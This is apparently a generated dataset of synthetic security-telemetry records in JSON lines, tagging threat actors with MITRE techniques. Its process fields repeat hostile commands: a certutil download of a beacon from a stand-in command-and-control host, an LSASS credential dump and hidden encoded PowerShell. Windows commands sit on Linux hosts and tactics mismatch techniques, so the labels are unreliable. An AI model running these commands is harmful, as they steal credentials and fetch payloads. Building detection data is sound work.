text
stringlengths
1.13k
1.33k
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_apt41_20250914T110559000Z_0004601","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.94.80.100","name":"APP-WEB-Y5C736FTUC","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4601APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.73.66.192","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-09-03T13:12:32.000Z","user":{"name":"arn:aws:iam::xy1zhgcpqggh","sid":"S-1-5-21-720802694-539306256-3834"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Execution","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250906T230455000Z_0004603","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.5.3.198","name":"WIN-FIN-SRV-TZGF2ZSX6Q","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4603Mustang PandaT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.192.3.14","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-06T01:42:03.000Z","user":{"name":"azuread\\fl6wt1zbn4ya","sid":"S-1-5-21-604975051-347594816-2469"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Defense Evasion","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260522T162504000Z_0004605","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.212.97.54","name":"EC2-INST-0Z4XLPJ31M","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4605Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.171.52.212","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-08T22:25:25.000Z","user":{"name":"i-lmqz1n1ai6xh","sid":"S-1-5-21-394352804-318598490-8639"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control","Privilege Escalation","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250719T113302000Z_0004607","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.5.26.106","name":"EC2-INST-L10VVLLTSL","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4607APT41T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.187.74.113","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-21T19:17:59.000Z","user":{"name":"i-wx8031lixt61","sid":"S-1-5-21-230483331-537588978-7652"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_apt41_20261122T054710000Z_0004609","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.85.14.30","name":"APP-WEB-BAC42WTJGV","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4609APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.152.79.23","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 569 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-27T19:02:19.000Z","user":{"name":"CORP\\h2yvoecvn3xb","sid":"S-1-5-21-688413169-992867076-1223"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Command and Control"],"technique_id":"T1570"},"event_id":"evt_apt41_20260310T230737000Z_0004611","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.119.227.3","name":"APP-WEB-T7L0TX1PON","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4611APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.98.163.243","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-04T06:35:20.000Z","user":{"name":"azuread\\di4mxat44vl5","sid":"S-1-5-21-157554931-251554891-9796"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250504T002400000Z_0004613","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.186.58.53","name":"AZURE-VM-657HE7TJ2V","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4613Volt TyphoonT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.137.158.205","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2825 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-22T02:32:53.000Z","user":{"name":"svc_bnsaclkkdfjy","sid":"S-1-5-21-974350636-511447241-6102"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Execution","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20251220T134613000Z_0004615","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.150.75.206","name":"AZURE-VM-ZFORRZWYOW","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4615Scattered SpiderT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.11.189.212","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-05T19:45:04.000Z","user":{"name":"arn:aws:iam::rtihtsk9m4o7","sid":"S-1-5-21-906835276-718220236-7247"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250618T143728000Z_0004617","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.14.236.2","name":"IAM-ROLE-I8WJQE52G3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4617UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.89.200.174","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-06-04T06:17:38.000Z","user":{"name":"azuread\\sm28cu5i08gz","sid":"S-1-5-21-685847251-102602271-8971"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation","Impact","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250903T154329000Z_0004619","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.244.101.88","name":"DB-ORACLE-PLIM739SVI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4619APT41T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.119.23.109","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3960 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-06T09:37:09.000Z","user":{"name":"i-0maopk7ae4uo","sid":"S-1-5-21-907973751-103773772-8432"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Discovery"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260110T200333000Z_0004621","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.158.150.178","name":"WIN-FIN-SRV-2ZVHUSXL5G","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4621Lapsus$T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.191.240.35","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3612 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-13T09:49:19.000Z","user":{"name":"i-kc6nzmadxv8p","sid":"S-1-5-21-527555506-174955344-8244"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection","Impact","Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260402T015109000Z_0004623","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.196.62.220","name":"APP-WEB-CL8SZ2RC11","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4623Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.101.74.85","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-14T19:14:02.000Z","user":{"name":"arn:aws:iam::9co6cwrioki0","sid":"S-1-5-21-464891990-492356004-6114"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250706T141624000Z_0004625","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.59.125.17","name":"WIN-FIN-SRV-7YJK41NWKK","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4625UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.125.77.142","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-13T12:16:05.000Z","user":{"name":"azuread\\g29lsaj326th","sid":"S-1-5-21-962225477-743656339-6265"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Execution","Impact"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20250708T032355000Z_0004627","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.120.238.41","name":"APP-WEB-AGLGJGB7LM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4627UNC4841T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.143.105.225","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3334 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-10T00:44:20.000Z","user":{"name":"CORP\\vyo4cvf0i2l0","sid":"S-1-5-21-492068265-160795004-1609"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Command and Control","Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260626T065331000Z_0004629","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.37.97.232","name":"IAM-ROLE-9GN4IA2AGH","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4629Lapsus$T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.189.78.17","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-29T17:32:01.000Z","user":{"name":"CORP\\se7j8nbhae4k","sid":"S-1-5-21-501873781-743488149-5237"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260918T064755000Z_0004631","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.41.240.157","name":"DB-ORACLE-WUL1I62O9L","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4631APT41T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.82.17.147","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2339 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-08-30T17:40:49.000Z","user":{"name":"CORP\\ds6ihxmjyqje","sid":"S-1-5-21-347766884-638096326-6819"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_lapsus_20250619T090957000Z_0004633","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.217.159.147","name":"APP-WEB-FYR55CEI1X","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4633Lapsus$T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.88.123.116","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-14T07:37:27.000Z","user":{"name":"svc_29w02wgti5ev","sid":"S-1-5-21-954504282-913618796-2103"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250608T102940000Z_0004635","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.235.63.9","name":"WIN-FIN-SRV-4XT4KQQDOD","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4635APT41T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.54.213.241","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1751 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-18T15:43:47.000Z","user":{"name":"CORP\\kywx969cwb6j","sid":"S-1-5-21-377149452-106574694-5650"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Impact","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20261030T145950000Z_0004637","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.164.145.132","name":"WIN-FIN-SRV-RC1I0KYF39","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4637UNC4841T1484.001"},"network":{"domain":"github.com","dst_ip":"1.44.168.168","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2725 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-05-28T00:35:21.000Z","user":{"name":"arn:aws:iam::8rkninlt508e","sid":"S-1-5-21-834112401-417850732-7756"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260308T094203000Z_0004639","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.162.172.205","name":"IAM-ROLE-JLVS782TKX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4639Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.37.68.8","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-07T19:20:37.000Z","user":{"name":"CORP\\9fd2ser2mzo0","sid":"S-1-5-21-201552396-997133537-1276"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_apt41_20260313T004216000Z_0004641","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.246.66.161","name":"AZURE-VM-B38FLH5IRW","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4641APT41T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.176.229.168","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3701 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-20T10:38:29.000Z","user":{"name":"azuread\\e0lfp1gygcz9","sid":"S-1-5-21-635726218-984946730-2891"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Reconnaissance","Credential Access"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20260413T165217000Z_0004643","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.70.236.36","name":"APP-WEB-3ADIUKDVN7","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4643Mustang PandaT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.183.107.66","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3315 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-22T23:44:52.000Z","user":{"name":"CORP\\5iuonnmzxx9l","sid":"S-1-5-21-544290372-506936706-4179"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20261103T115036000Z_0004645","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.129.221.202","name":"EC2-INST-1RA590STBG","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4645Mustang PandaT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.170.142.13","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1851 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-22T17:04:47.000Z","user":{"name":"CORP\\dsvjw256ehrx","sid":"S-1-5-21-925414924-540866937-1778"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Impact","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260604T071936000Z_0004647","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.202.89.71","name":"APP-WEB-8UCVANZPAU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4647FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.90.88.176","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, 